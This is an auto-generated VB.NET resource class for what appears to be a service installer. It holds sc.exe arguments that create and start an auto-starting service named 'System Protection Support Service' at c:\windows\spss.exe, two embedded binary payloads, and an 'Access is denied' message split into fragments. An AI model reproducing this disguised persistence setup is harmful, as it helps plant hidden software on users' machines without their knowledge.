'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.42000
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("hcalm.opctrl.ctrlsysserviceinst.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Access.
        '''</summary>
        Friend ReadOnly Property _1() As String
            Get
                Return ResourceManager.GetString("_1", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to is.
        '''</summary>
        Friend ReadOnly Property _2() As String
            Get
                Return ResourceManager.GetString("_2", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to denied.
        '''</summary>
        Friend ReadOnly Property _3() As String
            Get
                Return ResourceManager.GetString("_3", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to ..
        '''</summary>
        Friend ReadOnly Property _fs() As String
            Get
                Return ResourceManager.GetString("_fs", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to a b c d e f g h i j k.
        '''</summary>
        Friend ReadOnly Property ags() As String
            Get
                Return ResourceManager.GetString("ags", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property calmclientandserver() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("calmclientandserver", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to create &quot;System Protection Support Service&quot; binPath= &quot;c:\windows\spss.exe&quot; start= auto.
        '''</summary>
        Friend ReadOnly Property cmdargs() As String
            Get
                Return ResourceManager.GetString("cmdargs", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to start &quot;System Protection Support Service&quot;.
        '''</summary>
        Friend ReadOnly Property cmdargs2() As String
            Get
                Return ResourceManager.GetString("cmdargs2", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property operation_ctrl_sys_service() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("operation_ctrl_sys_service", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to sc.exe.
        '''</summary>
        Friend ReadOnly Property srvinst() As String
            Get
                Return ResourceManager.GetString("srvinst", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to c:\windows\spss.exe.
        '''</summary>
        Friend ReadOnly Property svpth() As String
            Get
                Return ResourceManager.GetString("svpth", resourceCulture)
            End Get
        End Property
    End Module
End Namespace
